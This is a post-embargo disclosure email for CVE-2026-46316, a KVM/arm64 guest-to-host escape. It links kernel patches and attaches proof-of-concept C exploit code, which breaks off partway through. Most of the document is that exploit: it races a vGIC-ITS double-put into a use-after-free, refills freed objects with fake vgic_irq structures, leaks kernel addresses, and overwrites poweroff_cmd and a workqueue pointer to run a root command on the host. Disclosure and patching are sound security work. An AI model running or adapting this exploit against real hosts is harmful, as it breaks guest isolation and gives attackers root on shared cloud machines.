Hi,

The embargo agreed upon with the maintainers of [email protected]
has expired, so I am publishing this report.

This is a report on "ITScape (CVE-2026-46316)", a KVM escape vulnerability in
KVM/arm64 that allows a guest to escape to the host and execute commands on the
host with kernel privileges (root). As far as is publicly known, this is the
first guest-to-host escape exploit research targeting KVM/arm64. This is not one
of the commonly disclosed QEMU escapes.

This vulnerability can threaten the guest-host isolation of KVM/arm64 hosts that
run guests, particularly multi-tenant arm64 public clouds.

CVE-2026-46316 was reported to [email protected] and has been patched in
mainline:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=13031fb6b8357fbbcded2a7f4cba73e4781ee594

"ITScape" essentially refers only to CVE-2026-46316, for which a working 
exploit 
has been demonstrated, but I recommend applying the following two patches as 
well:

- 
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=70543358fa08e0f7cebc3447c3b70fe97ad7aaa8
    (CVE-2026-46317)
- 
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f2ca45b50d4216c9cc7ffabf50d9ad1932209251

I have also attached the PoC as currently written.

For more details about the vulnerability and follow-up updates, please see:
https://itscape.io


Best regards,
Hyunwoo Kim

---

// SPDX-License-Identifier: GPL-2.0
/*
 * ITScape: Guest-to-Host Escape in KVM/arm64 (CVE-2026-46316)
 *
 * vGIC-ITS vgic_its_invalidate_cache() double-put UAF -> host-kernel code 
execution.
 *
 * Target: Linux v7.1-rc6 (aarch64). The hardcoded kernel addresses/offsets are 
for that build
 * with the bundled kconfig; re-derive them for other versions.
 *
 * Copyright (c) 2026 Hyunwoo Kim @v4bel
 * Adapted from vgic_lpi_stress.c (Copyright (c) 2024 Google LLC).
 */
#include <linux/sizes.h>
#include <pthread.h>
#include <stdatomic.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <grp.h>
#include <signal.h>

#include "kvm_util.h"
#include "gic.h"
#include "gic_v3.h"
#include "gic_v3_its.h"
#include "processor.h"
#include "ucall.h"
#include "vgic.h"

#define WRITES_ONLY_TEST        1
#define LEAK_TEST               1
#define TEST_MEMSLOT_INDEX      1
#define GIC_LPI_OFFSET          8192
#define TOUCH_MEMSLOT_INDEX     2
#define TOUCH_GPA               0x200000000UL   /* 8GB GPA */
#define TOUCH_SIZE              (32UL * SZ_2M)  /* cross-cache reclaim region 
(guest_memfd) */
#define GITS1_BASE_GPA          0x8100000ULL    /* 2nd ITS frame (after GICR 
for <=7 vcpus); own cmd_lock */
#define GITS1_BASE_GVA          ((volatile void *)GITS1_BASE_GPA)

#define QUIESCE_CYCLES          16      /* vCPU exits to settle delivery+prune 
-> refcount 2 */
#define GRACE_CYCLES            2500    /* vCPU exits so host RCU + kfree_rcu 
batch flush (no host sleep) */

#define RECLAIM_INTID_BASE      0x4000  /* fresh refill LPIs use intid 16384.. 
(old LPIs use 8192..) */
#define SPARSE_DEVID(d)         ((u32)(d))      /* cache_key = 
(devid<<16)|eventid */
#define RECLAIM_EVENTS          16      /* bounded fresh events/device/cpu to 
drain the per-cpu slab cache */
static volatile int reclaim_hits;
static volatile int total_irqs;
static volatile u64 leaked_v0;          /* cpuid0 stashes the real vcpu0 kaddr 
here; cpuid1 reads it back */

static gpa_t gpa_base;
static struct kvm_vm *vm;
static struct kvm_vcpu **vcpus;
static int its_fd;

/*
 * Self-contained guest ITS command layer, base-switchable for the 2-ITS 
exploit (xits_set_base).
 * The in-tree kvm selftest gic_v3_its lib gained a mutable MMIO base + 
INT/MOVI helpers only after
 * 7.0, so carry them here to build against a stock 7.0.x selftest tree.
 * Adapted from tools/testing/selftests/kvm/lib/arm64/gic_v3_its.c (GPL-2.0, 
Copyright Google LLC).
 */
#ifndef GITS_COLLECTION_TARGET_SHIFT
#define GITS_COLLECTION_TARGET_SHIFT 16
#endif
static volatile void *x_its_base = GITS_BASE_GVA;
static void xits_set_base(volatile void *base) { x_its_base = base; }
static u64  xr64(unsigned long off)        { return readq_relaxed(x_its_base + 
off); }
static void xw64(unsigned long off, u64 v) { writeq_relaxed(v, x_its_base + 
off); }
static u32  xr32(unsigned long off)        { return readl_relaxed(x_its_base + 
off); }
static void xw32(unsigned long off, u32 v) { writel_relaxed(v, x_its_base + 
off); }

static unsigned long xits_find_baser(unsigned int type)
{
        int i;
        for (i = 0; i < GITS_BASER_NR_REGS; i++) {
                unsigned long off = GITS_BASER + (i * sizeof(u64));
                if (GITS_BASER_TYPE(xr64(off)) == type)
                        return off;
        }
        GUEST_FAIL("Couldn't find an ITS BASER of type %u", type);
        return -1;
}

static void xits_install_table(unsigned int type, gpa_t base, size_t size)
{
        unsigned long off = xits_find_baser(type);
        u64 baser = ((size / SZ_64K) - 1) | GITS_BASER_PAGE_SIZE_64K |
                    GITS_BASER_InnerShareable | base | GITS_BASER_RaWaWb | 
GITS_BASER_VALID;
        xw64(off, baser);
}

static void xits_install_cmdq(gpa_t base, size_t size)
{
        u64 cbaser = ((size / SZ_4K) - 1) | GITS_CBASER_InnerShareable | base |
                     GITS_CBASER_RaWaWb | GITS_CBASER_VALID;
        xw64(GITS_CBASER, cbaser);
}

static void xits_init(gpa_t coll_tbl, size_t coll_tbl_sz, gpa_t device_tbl,
                      size_t device_tbl_sz, gpa_t cmdq, size_t cmdq_size)
{
        u32 ctlr;
        xits_install_table(GITS_BASER_TYPE_COLLECTION, coll_tbl, coll_tbl_sz);
        xits_install_table(GITS_BASER_TYPE_DEVICE, device_tbl, device_tbl_sz);
        xits_install_cmdq(cmdq, cmdq_size);
        ctlr = xr32(GITS_CTLR);
        ctlr |= GITS_CTLR_ENABLE;
        xw32(GITS_CTLR, ctlr);
}

struct xits_cmd { union { u64 raw[4]; __le64 raw_le[4]; }; };
static void xenc(u64 *raw, u64 val, int h, int l)
{
        u64 mask = GENMASK_ULL(h, l);
        *raw = (*raw & ~mask) | ((val << l) & mask);
}

static void xits_send(void *cmdq_base, struct xits_cmd *cmd)
{
        u64 cwriter = xr64(GITS_CWRITER);
        struct xits_cmd *dst = cmdq_base + cwriter;
        u64 cbaser = xr64(GITS_CBASER);
        size_t cmdq_size = ((cbaser & 0xFF) + 1) * SZ_4K;
        u64 next;
        cmd->raw_le[0] = cpu_to_le64(cmd->raw[0]);
        cmd->raw_le[1] = cpu_to_le64(cmd->raw[1]);
        cmd->raw_le[2] = cpu_to_le64(cmd->raw[2]);
        cmd->raw_le[3] = cpu_to_le64(cmd->raw[3]);
        WRITE_ONCE(*dst, *cmd);
        dsb(ishst);
        next = (cwriter + sizeof(*cmd)) % cmdq_size;
        xw64(GITS_CWRITER, next);
        while (xr64(GITS_CREADR) != next)
                cpu_relax();
}

static u64 x_rdbase(u32 vcpu_id) { return (u64)vcpu_id << 
GITS_COLLECTION_TARGET_SHIFT; }

static void xits_send_mapd_cmd(void *cmdq, u32 devid, gpa_t itt, size_t 
itt_size, bool valid)
{
        struct xits_cmd c = {};
        xenc(&c.raw[0], GITS_CMD_MAPD, 7, 0);   xenc(&c.raw[0], devid, 63, 32);
        xenc(&c.raw[1], ilog2(itt_size) - 1, 4, 0);
        xenc(&c.raw[2], itt >> 8, 51, 8);       xenc(&c.raw[2], !!valid, 63, 
63);
        xits_send(cmdq, &c);
}

static void xits_send_mapc_cmd(void *cmdq, u32 vcpu_id, u32 col, bool valid)
{
        struct xits_cmd c = {};
        xenc(&c.raw[0], GITS_CMD_MAPC, 7, 0);   xenc(&c.raw[2], col, 15, 0);
        xenc(&c.raw[2], x_rdbase(vcpu_id) >> 16, 51, 16);  xenc(&c.raw[2], 
!!valid, 63, 63);
        xits_send(cmdq, &c);
}

static void xits_send_mapti_cmd(void *cmdq, u32 devid, u32 eid, u32 col, u32 
intid)
{
        struct xits_cmd c = {};
        xenc(&c.raw[0], GITS_CMD_MAPTI, 7, 0);  xenc(&c.raw[0], devid, 63, 32);
        xenc(&c.raw[1], eid, 31, 0);            xenc(&c.raw[1], intid, 63, 32);
        xenc(&c.raw[2], col, 15, 0);
        xits_send(cmdq, &c);
}

static void xits_send_movi_cmd(void *cmdq, u32 devid, u32 eid, u32 col)
{
        struct xits_cmd c = {};
        xenc(&c.raw[0], GITS_CMD_MOVI, 7, 0);   xenc(&c.raw[0], devid, 63, 32);
        xenc(&c.raw[1], eid, 31, 0);            xenc(&c.raw[2], col, 15, 0);
        xits_send(cmdq, &c);
}

static void xits_send_invall_cmd(void *cmdq, u32 col)
{
        struct xits_cmd c = {};
        xenc(&c.raw[0], GITS_CMD_INVALL, 7, 0); xenc(&c.raw[2], col, 15, 0);
        xits_send(cmdq, &c);
}

static void xits_send_sync_cmd(void *cmdq, u32 vcpu_id)
{
        struct xits_cmd c = {};
        xenc(&c.raw[0], GITS_CMD_SYNC, 7, 0);   xenc(&c.raw[2], 
x_rdbase(vcpu_id) >> 16, 51, 16);
        xits_send(cmdq, &c);
}

static void xits_send_int_cmd(void *cmdq, u32 devid, u32 eid)
{
        struct xits_cmd c = {};
        xenc(&c.raw[0], GITS_CMD_INT, 7, 0);    xenc(&c.raw[0], devid, 63, 32);
        xenc(&c.raw[1], eid, 31, 0);
        xits_send(cmdq, &c);
}

static struct test_data {
        u32     nr_cpus;
        u32     nr_devices;
        u32     nr_event_ids;
        u32     gsync_drain;    /* -g: extra GUEST_SYNC exits per WWW sweep 
(default 0) */
        gpa_t   device_table;
        gpa_t   collection_table;
        gpa_t   cmdq_base;
        void    *cmdq_base_va;
        gpa_t   itt_tables;
        gpa_t   lpi_prop_table;
        gpa_t   lpi_pend_tables;
        gpa_t   touch_base;
        /* ITS#1: own cmd_lock; cpuid1 runs the code-exec via it after cpuid0's 
leak crashes ITS#0 */
        gpa_t   device_table2;
        gpa_t   collection_table2;
        gpa_t   cmdq2_base;
        void    *cmdq2_base_va;
        gpa_t   itt_tables2;
} test_data = {
        .nr_cpus        = 4,    /* drainers for the double-put race (C(4,2)=6 
pairs) */
        .nr_devices     = 128,
        .nr_event_ids   = 1024, /* 128*1024 cache keys -> deep xarray -> wider 
native race window (-e overrides) */
        .touch_base     = TOUCH_GPA,
};

static void guest_irq_handler(struct ex_regs *regs)
{
        u32 intid = gic_get_and_ack_irq();

        if (intid == IAR_SPURIOUS)
                return;
        total_irqs++;
        /* a reclaim-range intid delivered while only OLD pairs were INT'd = 
old ITE now resolves to a
         * fresh guest-mapped vgic_irq that reused a freed slot (guest-only 
reclaim detector) */
        if (intid >= RECLAIM_INTID_BASE)
                reclaim_hits++;
        gic_set_eoi(intid);
}

/* MAPTI fresh LPIs to refill freed cg-96 slots; called from both vCPUs to 
drain both per-cpu caches */
static void guest_map_reclaim_range(u32 ev_start, u32 intid_base)
{
        u32 d, e, k = 0, coll = 0;

        for (d = 0; d < test_data.nr_devices; d++) {
                for (e = 0; e < RECLAIM_EVENTS; e++) {
                        xits_send_mapti_cmd(test_data.cmdq_base_va, 
SPARSE_DEVID(d), ev_start + e, coll,
                                           intid_base + k++);
                        coll = (coll + 1) % test_data.nr_cpus;
                }
        }
        for (d = 0; d < test_data.nr_cpus; d++)
                xits_send_sync_cmd(test_data.cmdq_base_va, d);
}

static inline volatile void *my_rdist(void)
{
        return GICR_BASE_GVA + guest_get_vcpuid() * SZ_64K * 2;
}

static void rdist_set_lpis(bool enable)
{
        volatile void *r = my_rdist();
        u32 ctlr = readl_relaxed(r + GICR_CTLR);

        if (enable)
                ctlr |= GICR_CTLR_ENABLE_LPIS;
        else
                ctlr &= ~GICR_CTLR_ENABLE_LPIS;
        writel_relaxed(ctlr, r + GICR_CTLR);
}

/* sense-reversing barrier across guest vCPUs (shared guest memory) */
static void guest_barrier(void)
{
        static atomic_int cnt;
        static atomic_int gen;
        int g = atomic_load(&gen);

        if (atomic_fetch_add(&cnt, 1) == (int)test_data.nr_cpus - 1) {
                atomic_store(&cnt, 0);
                atomic_fetch_add(&gen, 1);
        } else {
                while (atomic_load(&gen) == g)
                        cpu_relax();
        }
}

static void guest_send_all_ints(void)
{
        u32 d, e;

        for (d = 0; d < test_data.nr_devices; d++)
                for (e = 0; e < test_data.nr_event_ids; e++)
                        xits_send_int_cmd(test_data.cmdq_base_va, 
SPARSE_DEVID(d), e);
        for (d = 0; d < test_data.nr_cpus; d++)
                xits_send_sync_cmd(test_data.cmdq_base_va, d);
}

/* INT only the first ndev devices' LPIs (fewer dangling-irq gadget fires -> 
smaller preempt leak) */
static void guest_send_ndev_ints(u32 ndev)
{
        u32 d, e;

        if (ndev > test_data.nr_devices)
                ndev = test_data.nr_devices;
        for (d = 0; d < ndev; d++)
                for (e = 0; e < test_data.nr_event_ids; e++)
                        xits_send_int_cmd(test_data.cmdq_base_va, 
SPARSE_DEVID(d), e);
        for (d = 0; d < test_data.nr_cpus; d++)
                xits_send_sync_cmd(test_data.cmdq_base_va, d);
}

static void guest_setup_its_mappings(void)
{
        u32 coll_id, device_id, event_id, intid = GIC_LPI_OFFSET;
        u32 nr_events = test_data.nr_event_ids;
        u32 nr_devices = test_data.nr_devices;
        u32 nr_cpus = test_data.nr_cpus;

        for (coll_id = 0; coll_id < nr_cpus; coll_id++)
                xits_send_mapc_cmd(test_data.cmdq_base_va, coll_id, coll_id, 
true);

        coll_id = 0;
        for (device_id = 0; device_id < nr_devices; device_id++) {
                gpa_t itt_base = test_data.itt_tables + (device_id * SZ_64K);

                xits_send_mapd_cmd(test_data.cmdq_base_va, 
SPARSE_DEVID(device_id), itt_base, SZ_64K, true);
                for (event_id = 0; event_id < nr_events; event_id++) {
                        xits_send_mapti_cmd(test_data.cmdq_base_va, 
SPARSE_DEVID(device_id),
                                   event_id, coll_id, intid++);
                        coll_id = (coll_id + 1) % test_data.nr_cpus;
                }
        }
}

/* ITS#1: map devices 0,1 to the SAME intids as ITS#0 so their ITEs alias the 
same vgic_irqs.
 * After the double-put frees those irqs, ITS#1's ite->irq are also dangling -> 
cpuid1 fires the
 * gadget via ITS#1's cmdq (separate cmd_lock, not held by cpuid0's crash). */
static void guest_setup_its1(void)
{
        u32 device_id, event_id, intid = GIC_LPI_OFFSET;
        u32 nr_events = test_data.nr_event_ids;

        xits_set_base(GITS1_BASE_GVA);
        xits_init(test_data.collection_table2, SZ_64K,
                 test_data.device_table2, SZ_64K, test_data.cmdq2_base, SZ_64K);
        xits_send_mapc_cmd(test_data.cmdq2_base_va, 0, 0, true);
        for (device_id = 0; device_id < 2; device_id++) {
                xits_send_mapd_cmd(test_data.cmdq2_base_va, 
SPARSE_DEVID(device_id),
                                  test_data.itt_tables2 + (device_id * SZ_64K), 
SZ_64K, true);
                for (event_id = 0; event_id < nr_events; event_id++)
                        xits_send_mapti_cmd(test_data.cmdq2_base_va, 
SPARSE_DEVID(device_id),
                                           event_id, 0, intid++);
        }
        xits_send_sync_cmd(test_data.cmdq2_base_va, 0);
        xits_set_base(GITS_BASE_GVA);
}

/* fire INTs via ITS#1 (devices 0,1) -> resolve dangling ite->irq -> ops gadget 
(cmd_lock#1 clean) */
static void guest_send_ndev_ints2(u32 ndev)
{
        u32 d, e;

        if (ndev > 2)
                ndev = 2;
        xits_set_base(GITS1_BASE_GVA);
        for (d = 0; d < ndev; d++)
                for (e = 0; e < test_data.nr_event_ids; e++)
                        xits_send_int_cmd(test_data.cmdq2_base_va, 
SPARSE_DEVID(d), e);
        xits_send_sync_cmd(test_data.cmdq2_base_va, 0);
        xits_set_base(GITS_BASE_GVA);
}

#define LPI_PROP_DEFAULT_PRIO   0xa0
/* guest writes its own LPI property table, all LPIs DISABLED: the translation 
cache still
 * populates (gated by global EnableLPIs) so the double-put works, but no LPI 
is delivered. */
static void guest_configure_lpis(void)
{
        volatile u8 *tbl = (volatile u8 *)test_data.lpi_prop_table;
        size_t i;

        for (i = 0; i < SZ_64K; i++)
                tbl[i] = LPI_PROP_DEFAULT_PRIO | LPI_PROP_GROUP1;       /* 
DISABLED: cache-only */
}

static void guest_setup_gic(void)
{
        static atomic_int nr_cpus_ready = 0;
        u32 cpuid = guest_get_vcpuid();

        gic_init(GIC_V3, test_data.nr_cpus);
        gic_rdist_enable_lpis(test_data.lpi_prop_table, SZ_64K,
                              test_data.lpi_pend_tables + (cpuid * SZ_64K));

        atomic_fetch_add(&nr_cpus_ready, 1);
        if (cpuid > 0)
                return;

        while (atomic_load(&nr_cpus_ready) < test_data.nr_cpus)
                cpu_relax();

        xits_init(test_data.collection_table, SZ_64K,
                 test_data.device_table, SZ_64K, test_data.cmdq_base, SZ_64K);

        guest_setup_its_mappings();
        guest_setup_its1();

        for (cpuid = 0; cpuid < test_data.nr_cpus; cpuid++)
                xits_send_invall_cmd(test_data.cmdq_base_va, cpuid);
        for (cpuid = 0; cpuid < test_data.nr_cpus; cpuid++)
                xits_send_sync_cmd(test_data.cmdq_base_va, cpuid);
}



/* orderly_poweroff(x0=kvm): kvm is 8-byte aligned so bit0=0 -> poweroff_force 
NOT set -> no host
 * shutdown -> queue_work_on(poweroff_work) (atomic-safe) -> poweroff_work_func 
argv_split's
 * poweroff_cmd and call_usermodehelper's it with init_cred -> runs as root. */
#define ORDERLY_POWEROFF 0xffff8000800df92cULL
#define POWEROFF_CMD     0xffff800082d003c8ULL  /* writable .data; argv_split'd 
+ UMH'd as root */
/* arp_tbl.gc_work.work.func (arp_tbl + 304) = neigh_periodic_work; the WWW 
overwrites it (at
 * runtime addr +voff) with orderly_poweroff. Re-armed ~every 
BASE_REACHABLE_TIME/2 (~15s) and
 * fires POST-exit (a during-run fire would wedge the leaked-preempt vCPU's 
exit). */
#define NEIGH_GC_WORK_FUNC 0xffff8000831d2d50ULL

/* The live WWW uses RUNTIME addresses (linked + leaked voff) in 
guest_exploit_rt(); only
 * SC_WRITES[0] is used live, as the ops=0 placeholder for the P4 cross-cache 
fill. */
static const struct { u64 t, w; } SC_WRITES[] = {
        { POWEROFF_CMD + 0x00, 0x756f742f6e69622fULL }, /* "/bin/tou" */
        { POWEROFF_CMD + 0x08, 0x635354492f206863ULL }, /* "ch /ITSc" */
        { POWEROFF_CMD + 0x10, 0x0000000000657061ULL }, /* "ape\0" => 
"/bin/touch /ITScape" */
        { NEIGH_GC_WORK_FUNC, ORDERLY_POWEROFF },
};
#define NR_SC_WRITES (sizeof(SC_WRITES)/sizeof(SC_WRITES[0]))


static void guest_prefault_gmem_pt(void)        /* fault the TOUCH region's 
stage-2 PT from fresh mem */
{
        volatile u8 *p = (volatile u8 *)test_data.touch_base;
        u64 off;
        for (off = 0; off < TOUCH_SIZE; off += SZ_2M)
                p[off] = 0x00;
}

/* Fill every 96B gmem slot as a fake vgic_irq: irq_lock@0=0, intid@4=LPI, 
hw@56=0, rcu.func@16,
 * ops@80. A dangling ITE resolving here -> trigger_msi -> 
vgic_queue_irq_unlock: if ops!=0 the
 * kernel calls *(ops+16) (gadget); else it takes the oracle path. Only every 
GSTRIDE-th slot is an
 * ACTION (ops!=0) slot so the gadget fires few times (the rest take the oracle 
path and unlock,
 * keeping the per-CPU preempt leak small). */
#define GSTRIDE 256
static void guest_fill_op4(u64 ops_val, u64 f20, u64 f28, u64 fn16)
{
        u64 base = test_data.touch_base, off, o;
        for (off = 0; off < TOUCH_SIZE; off += 4096) {
                volatile u8 *page = (volatile u8 *)(base + off);
                for (o = 0; o + 96 <= 4096; o += 96) {
                        volatile u8 *obj = page + o;
                        u64 gslot = (off >> 12) * 42 + (o / 96);        /* 
global slot index */
                        *(volatile u32 *)(obj + 0)    = 0;              /* 
irq_lock = unlocked */
                        *(volatile u32 *)(obj + 4)    = 0x2000;         /* 
intid = 8192 (LPI) */
                        *(volatile u64 *)(obj + 16)   = fn16;           /* 
rcu.func = *(ops+16) = gadget */
                        *(volatile u8  *)(obj + 56)   = 0x00;           /* hw=0 
-> oracle returns NULL */
                        *(volatile u32 *)(obj + 60)   = 2;              /* 
refcount >= 1 */
                        if ((gslot % GSTRIDE) == 0) {                   /* 
ACTION slot: gadget fires */
                                *(volatile u64 *)(obj + 0x20) = f20;    /* 
gadget x0 base (T-0x28) */
                                *(volatile u64 *)(obj + 0x28) = f28;    /* 
gadget value */
                                *(volatile u64 *)(obj + 80)   = ops_val;
                        } else {                                        /* 
BALANCE slot: oracle path -> unlock */
                                *(volatile u64 *)(obj + 0x28) = 0;
                                *(volatile u64 *)(obj + 80)   = 0;
                        }
                }
        }
}

/* 3-arg wrapper (fn16=0): the P4 cross-cache fill (ops=0, no gadget) */
static void guest_fill_op(u64 ops_val, u64 f20, u64 f28)
{
        guest_fill_op4(ops_val, f20, f28, 0);
}

/* Arbitrary-read primitive (native list_add path, no gadget). The fake irq has 
ops==NULL and
 * active=1,vcpu=0 so vgic_target_oracle returns irq->target_vcpu; then
 * list_add_tail(&irq->ap_list, &target_vcpu->ap_list_head) does new->prev = 
head->prev =
 * *(target_vcpu + 6656) and deposits it into gmem+32. Choosing target_vcpu = Y 
- 6656 reads *(Y)
 * back into guest-readable gmem.  (ap_list_head@6648, ap_list_lock@6640, 
active=byte56 bit5.) */
#define LEAK_SENTINEL 0x4c45414b4c454144ULL
static void guest_fill_read(u64 target_vcpu, u64 sentinel)
{
        u64 base = test_data.touch_base, off, o;
        for (off = 0; off < TOUCH_SIZE; off += 4096) {
                volatile u8 *page = (volatile u8 *)(base + off);
                for (o = 0; o + 96 <= 4096; o += 96) {
                        volatile u8 *obj = page + o;
                        *(volatile u32 *)(obj + 0)    = 0;              /* 
irq_lock unlocked */
                        *(volatile u32 *)(obj + 4)    = 0x2000;         /* 
intid = 8192 (LPI) */
                        *(volatile u64 *)(obj + 24)   = 0;              /* 
ap_list.next (set by list_add) */
                        *(volatile u64 *)(obj + 32)   = sentinel;       /* 
ap_list.prev -> OLD *(Y) leak */
                        *(volatile u64 *)(obj + 40)   = 0;              /* 
vcpu=0 -> oracle returns target_vcpu */
                        *(volatile u64 *)(obj + 48)   = target_vcpu;    /* 
target_vcpu = Y - 6656 */
                        *(volatile u8  *)(obj + 56)   = 0x20;           /* 
active bit */
                        *(volatile u32 *)(obj + 60)   = 2;              /* 
refcount >= 1 */
                        *(volatile u64 *)(obj + 80)   = 0;              /* ops 
= NULL -> NATIVE path */
                }
        }
}

/* scan reclaimed gmem at byte offset `fo` for a slot whose value changed from 
sentinel */
static u64 guest_scan_leak_off(u64 sentinel, u32 fo)
{
        u64 base = test_data.touch_base, off, o;
        for (off = 0; off < TOUCH_SIZE; off += 4096) {
                volatile u8 *page = (volatile u8 *)(base + off);
                for (o = 0; o + 96 <= 4096; o += 96) {
                        u64 v = *(volatile u64 *)(page + o + fo);
                        if (v != sentinel && v != 0)
                                return v;
                }
        }
        return 0;
}

/* scan gmem+32 for a kernel-IMAGE pointer (bit47=1, i.e. (v>>47)==0x1ffff). 
bit47 separates the
 * kernel image (anchored at the VA_BITS_MIN=48 upper half) from the linmap on 
BOTH vabits=48 and
 * vabits=52 hosts -> vabits-independent. Excludes the known guest-written f20 
and the sentinel. */
static u64 guest_scan_image(void)
{
        u64 base = test_data.touch_base, off, o;
        for (off = 0; off < TOUCH_SIZE; off += 4096) {
                volatile u8 *page = (volatile u8 *)(base + off);
                for (o = 0; o + 96 <= 4096; o += 96) {
                        u64 v = *(volatile u64 *)(page + o + 32);
                        /* (POWEROFF_CMD - 0x28) == the f20 the P4 fill 
deposits at +32 (line ~518); track
                         * the #define so re-deriving POWEROFF_CMD for your 
build updates this exclusion too. */
                        if ((v >> 47) == 0x1ffffULL && v != (POWEROFF_CMD - 
0x28) && v != LEAK_SENTINEL)
                                return v;
                }
        }
        return 0;
}

/* scan gmem+32 for a direct-map (linmap) kernel pointer = the kaddr of another 
fake-irq slot in
 * this TOUCH region (top-12=0xfff, bit47=0; vabits-independent). Excludes 0, 
sentinel, and the
 * vcpu0 struct range (the first chained add deposits &vcpu0->ap_list_head, not 
a gmem slot). */
static u64 guest_scan_gmem_kaddr(u64 sentinel, u64 v0)
{
        u64 base = test_data.touch_base, off, o;
        for (off = 0; off < TOUCH_SIZE; off += 4096) {
                volatile u8 *page = (volatile u8 *)(base + off);
                for (o = 0; o + 96 <= 4096; o += 96) {
                        u64 v = *(volatile u64 *)(page + o + 32);
                        if (v == 0 || v == sentinel)
                                continue;
                        if ((v >> 52) != 0xfffULL || (v >> 47) == 0x1ffffULL)
                                continue;
                        if (v >= v0 && v < v0 + 0x4000ULL)
                                continue;
                        return v;       /* = some fake-irq's &ap_list = 
slot_base + 24 */
                }
        }
        return 0;
}

/* self-chain leak round: fill dangling slots with target_vcpu = real vcpu0 
(v0) so the adds chain
 * on vcpu0's genuine ap_list_head (crash-free, balanced lock). The 2nd add 
deposits a prior
 * fake-irq's own gmem kaddr into gmem+32 -> a runtime gmem-slot kaddr (the ops 
landing). */
static u64 guest_selfchain_leak_v0(u64 v0)
{
        int k;
        u64 cand;
        for (k = 0; k < 8; k++) {
                guest_fill_read(v0, LEAK_SENTINEL);
                guest_send_ndev_ints2(2);
                GUEST_SYNC(4);
                cand = guest_scan_gmem_kaddr(LEAK_SENTINEL, v0);
                if (cand)
                        return cand - 24;       /* &ap_list (offset 24) -> slot 
base kaddr */
        }
        return 0;
}

/* PMU_FN_LINKED = linked addr of kvm_pmu_perf_overflow_notify_vcpu (.text). 
Leaked at runtime via
 * pmu.overflow_work.func @ vcpu+7328 (func-16 = irq_work.node = 0, so the 
ap_list_lock the leak's
 * list_add takes is acquirable). kimage_voffset = leaked - PMU_FN_LINKED. */
#define PMU_FN_LINKED 0xffff800080090eb8ULL
static void guest_exploit_rt(u64 voff)
{
        struct { u64 t, w; } scw[4];
        int k;
        u64 gadget_rt = 0xffff800080d7c6dcULL + voff;   /* ed_deschedule+0xd4 
gadget at runtime addr */
        u64 ops_rt, v0;
        scw[0].t = (0xffff800082d003c8ULL + voff) + 0x00; scw[0].w = 
0x756f742f6e69622fULL; /* "/bin/tou" */
        scw[1].t = (0xffff800082d003c8ULL + voff) + 0x08; scw[1].w = 
0x635354492f206863ULL; /* "ch /ITSc" */
        scw[2].t = (0xffff800082d003c8ULL + voff) + 0x10; scw[2].w = 
0x0000000000657061ULL; /* "ape\0" -> "/bin/touch /ITScape" */
        scw[3].t = (0xffff8000831d2d50ULL + voff);        scw[3].w = 
(0xffff8000800df92cULL + voff); /* arp_tbl.gc_work.func = orderly_poweroff */

        /* derive the ops landing slot from a runtime gmem self-leak (v0 = real 
vcpu0 kaddr, leaked
         * crash-free by cpuid0). *(ops_rt+16) = gadget_rt because 
guest_fill_op4 writes it at every +16. */
        v0 = leaked_v0;
        for (k = 0; k < 4000 && !v0; k++) {
                GUEST_SYNC(7);
                v0 = leaked_v0;
        }
        ops_rt = v0 ? guest_selfchain_leak_v0(v0) : 0;
        if (!ops_rt) {
                GUEST_PRINTF("leak: self-chain miss (v0=0x%lx) - retry boot\n", 
(unsigned long)v0);
                return;
        }
        GUEST_PRINTF("ops landing = 0x%lx, gadget = 0x%lx\n",
                     (unsigned long)ops_rt, (unsigned long)gadget_rt);
        /* WWW via ITS#1's cmdq: INT resolves the dangling ite->irq -> ops 
gadget -> *(t)=w, one scw per sweep */
        for (k = 0; k < 4; k++) {
                guest_fill_op4(ops_rt, scw[k].t - 0x28, scw[k].w, gadget_rt);
                guest_send_ndev_ints2(2);
                GUEST_SYNC(5);
                {
                        u32 dd;
                        for (dd = 0; dd < test_data.gsync_drain; dd++)
                                GUEST_SYNC(5);
                }
        }
}

static void guest_send_movi_coll(u32 ndev, u32 coll)
{
        u32 d, e;
        if (ndev > test_data.nr_devices)
                ndev = test_data.nr_devices;
        for (d = 0; d < ndev; d++)
                for (e = 0; e < test_data.nr_event_ids; e++)
                        xits_send_movi_cmd(test_data.cmdq_base_va, 
SPARSE_DEVID(d), e, coll);
        for (d = 0; d < test_data.nr_cpus; d++)
                xits_send_sync_cmd(test_data.cmdq_base_va, d);
}

static void guest_send_movi(u32 ndev) { guest_send_movi_coll(ndev, 0); }

static void guest_code(void)
{
        u32 cpuid = guest_get_vcpuid();
        int i;

        if (cpuid == 0)
                guest_configure_lpis();
        guest_barrier();
        guest_setup_gic();
        local_irq_enable();

        if (cpuid == 0) {
                guest_send_all_ints();          /* P0: prime ITS#0 cache */
                guest_send_ndev_ints2(2);       /* P0: prime ITS#1 cache 
(devices 0,1) -> aliased refcount=4 */
        }
        GUEST_SYNC(0);

        for (i = 0; i < QUIESCE_CYCLES; i++)    /* P1: deliver+EOI+prune -> 
refcount 2 */
                GUEST_SYNC(1);

        if (cpuid == 0)                         /* P1.5: pre-fault the 
TOUCH-region stage-2 PT */
                guest_prefault_gmem_pt();
        GUEST_SYNC(1);

        /* P2 race: both vCPUs clear ENABLE_LPIS at once -> concurrent 
invalidate_all_caches -> double-put */
        guest_barrier();
        rdist_set_lpis(false);
        guest_barrier();
        rdist_set_lpis(true);

        for (i = 0; i < GRACE_CYCLES; i++)      /* P3 grace: vCPU exits so host 
RCU + kfree_rcu flush */
                GUEST_SYNC(2);

        /* P4: vCPU0 faults every gmem page (cross-cache reclaim) + fills it; 
then all vCPUs refill the
         * freed cg-96 slots (each drains its own per-cpu cache -> ~no stale 
dangling ITE). */
        if (cpuid == 0) {
                GUEST_PRINTF("cross-cache fill across %lu MB gmem\n", (unsigned 
long)(TOUCH_SIZE >> 20));
                guest_fill_op(0, SC_WRITES[0].t - 0x28, SC_WRITES[0].w);        
/* ops=0: fault pages only */
        }
        guest_barrier();
        {
                u32 c, ne = test_data.nr_event_ids, nd = test_data.nr_devices;
                for (c = 0; c < test_data.nr_cpus; c++) {
                        if (cpuid == c)
                                guest_map_reclaim_range((1 + 2 * c) * ne,
                                                        RECLAIM_INTID_BASE + c 
* 2 * ne * nd);
                        guest_barrier();
                }
        }
        GUEST_SYNC(3);

#ifdef LEAK_TEST
        /* cpuid!=0: poll gmem for the image pointer cpuid0's ISO-LEAK 
